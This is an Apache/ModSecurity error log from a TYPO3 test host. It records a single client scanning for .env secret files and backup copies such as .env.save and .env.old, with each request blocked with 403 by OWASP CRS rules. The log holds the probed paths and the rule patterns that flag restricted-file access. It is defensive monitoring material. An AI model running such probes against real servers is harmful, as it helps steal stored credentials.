[Sat Nov 22 00:05:46.026838 2025] [:error] [pid 243344] [client 3.9.175.83:48058] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSDwShprncRmilB7cHSolgAAAAg"]
[Sat Nov 22 00:05:46.027016 2025] [:error] [pid 243344] [client 3.9.175.83:48058] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSDwShprncRmilB7cHSolgAAAAg"]
[Sat Nov 22 00:05:46.036739 2025] [authz_core:error] [pid 243341] [client 3.9.175.83:48072] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/public
[Sat Nov 22 00:05:46.043941 2025] [:error] [pid 243340] [client 3.9.175.83:48100] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSDwSpeLEhOLAInnw0NqgAAAAAA"]
[Sat Nov 22 00:05:46.044152 2025] [:error] [pid 243340] [client 3.9.175.83:48100] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSDwSpeLEhOLAInnw0NqgAAAAAA"]
[Sat Nov 22 00:05:46.044310 2025] [:error] [pid 243340] [client 3.9.175.83:48100] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.save"] [unique_id "aSDwSpeLEhOLAInnw0NqgAAAAAA"]
[Sat Nov 22 00:05:51.496996 2025] [:error] [pid 243342] [client 3.9.175.83:50576] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSDwTybqTrlsHApMKqWIjgAAAAI"]
[Sat Nov 22 00:05:51.497231 2025] [:error] [pid 243342] [client 3.9.175.83:50576] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSDwTybqTrlsHApMKqWIjgAAAAI"]
[Sat Nov 22 00:05:51.497417 2025] [:error] [pid 243342] [client 3.9.175.83:50576] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.save"] [unique_id "aSDwTybqTrlsHApMKqWIjgAAAAI"]
[Sat Nov 22 00:05:51.501756 2025] [authz_core:error] [pid 243344] [client 3.9.175.83:50618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/assets
[Sat Nov 22 00:05:51.503420 2025] [:error] [pid 243341] [client 3.9.175.83:50606] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSDwTwqyqiDG5tICQX6npQAAAAE"]
[Sat Nov 22 00:05:51.503621 2025] [:error] [pid 243341] [client 3.9.175.83:50606] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSDwTwqyqiDG5tICQX6npQAAAAE"]
[Sat Nov 22 00:05:51.503776 2025] [:error] [pid 243341] [client 3.9.175.83:50606] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aSDwTwqyqiDG5tICQX6npQAAAAE"]
[Sat Nov 22 00:05:51.566916 2025] [:error] [pid 243340] [client 3.9.175.83:50558] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSDwT5eLEhOLAInnw0NqgQAAAAA"]
[Sat Nov 22 00:05:51.567133 2025] [:error] [pid 243340] [client 3.9.175.83:50558] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSDwT5eLEhOLAInnw0NqgQAAAAA"]
[Sat Nov 22 00:05:51.567306 2025] [:error] [pid 243340] [client 3.9.175.83:50558] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aSDwT5eLEhOLAInnw0NqgQAAAAA"]
[Sat Nov 22 00:05:51.628243 2025] [authz_core:error] [pid 243343] [client 3.9.175.83:50598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/includes
[Sat Nov 22 00:05:51.674162 2025] [:error] [pid 243398] [client 3.9.175.83:50686] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSDwTxxGpDYkt8_grHyz0QAAAAQ"]
[Sat Nov 22 00:05:51.674368 2025] [:error] [pid 243398] [client 3.9.175.83:50686] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSDwTxxGpDYkt8_grHyz0QAAAAQ"]
[Sat Nov 22 00:05:51.674611 2025] [:error] [pid 243398] [client 3.9.175.83:50686] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSDwTxxGpDYkt8_grHyz0QAAAAQ"]
[Sat Nov 22 00:05:51.674786 2025] [:error] [pid 243398] [client 3.9.175.83:50686] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.old"] [unique_id "aSDwTxxGpDYkt8_grHyz0QAAAAQ"]
[Sat Nov 22 00:05:51.681783 2025] [:error] [pid 243341] [client 3.9.175.83:50642] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSDwTwqyqiDG5tICQX6npgAAAAE"]
[Sat Nov 22 00:05:51.681992 2025] [:error] [pid 243341] [client 3.9.175.83:50642] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSDwTwqyqiDG5tICQX6npgAAAAE"]
[Sat Nov 22 00:05:51.682193 2025] [:error] [pid 243341] [client 3.9.175.83:50642] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSDwTwqyqiDG5tICQX6npgAAAAE"]
[Sat Nov 22 00:05:51.682498 2025] [:error] [pid 243341] [client 3.9.175.83:50642] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env.old"] [unique_id "aSDwTwqyqiDG5tICQX6npgAAAAE"]
[Sat Nov 22 00:05:51.724330 2025] [:error] [pid 243390] [client 3.9.175.83:50586] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSDwT7uOi_dqsgv2AxsAWwAAAAM"]
[Sat Nov 22 00:05:51.724548 2025] [:error] [pid 243390] [client 3.9.175.83:50586] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSDwT7uOi_dqsgv2AxsAWwAAAAM"]
[Sat Nov 22 00:05:51.724718 2025] [:error] [pid 243390] [client 3.9.175.83:50586] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.save"] [unique_id "aSDwT7uOi_dqsgv2AxsAWwAAAAM"]
[Sat Nov 22 00:05:52.093697 2025] [:error] [pid 243342] [client 3.9.175.83:50828] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSDwUCbqTrlsHApMKqWIjwAAAAI"]
[Sat Nov 22 00:05:52.093920 2025] [:error] [pid 243342] [client 3.9.175.83:50828] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSDwUCbqTrlsHApMKqWIjwAAAAI"]
[Sat Nov 22 00:05:52.094174 2025] [:error] [pid 243342] [client 3.9.175.83:50828] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aSDwUCbqTrlsHApMKqWIjwAAAAI"]
[Sat Nov 22 00:05:52.217240 2025] [:error] [pid 243344] [client 3.9.175.83:50936] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSDwUBprncRmilB7cHSomAAAAAg"]
[Sat Nov 22 00:05:52.217405 2025] [:error] [pid 243344] [client 3.9.175.83:50936] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSDwUBprncRmilB7cHSomAAAAAg"]
[Sat Nov 22 00:05:52.217611 2025] [:error] [pid 243344] [client 3.9.175.83:50936] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSDwUBprncRmilB7cHSomAAAAAg"]
[Sat Nov 22 00:05:52.217838 2025] [:error] [pid 243344] [client 3.9.175.83:50936] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/includes/.env.old"] [unique_id "aSDwUBprncRmilB7cHSomAAAAAg"]
[Sat Nov 22 00:05:56.898298 2025] [authz_core:error] [pid 243343] [client 3.9.175.83:53354] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/lib
[Sat Nov 22 00:05:57.058849 2025] [:error] [pid 243390] [client 3.9.175.83:53426] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSDwVbuOi_dqsgv2AxsAXAAAAAM"]
[Sat Nov 22 00:05:57.059067 2025] [:error] [pid 243390] [client 3.9.175.83:53426] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSDwVbuOi_dqsgv2AxsAXAAAAAM"]
[Sat Nov 22 00:05:57.059231 2025] [:error] [pid 243390] [client 3.9.175.83:53426] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aSDwVbuOi_dqsgv2AxsAXAAAAAM"]
[Sat Nov 22 00:05:57.117281 2025] [:error] [pid 243400] [client 3.9.175.83:53482] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSDwVfeCuJGFTSZ93xy5YAAAAAU"]
[Sat Nov 22 00:05:57.117587 2025] [:error] [pid 243400] [client 3.9.175.83:53482] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env.save"] [unique_id "aSDwVfeCuJGFTSZ93xy5YAAAAAU"]
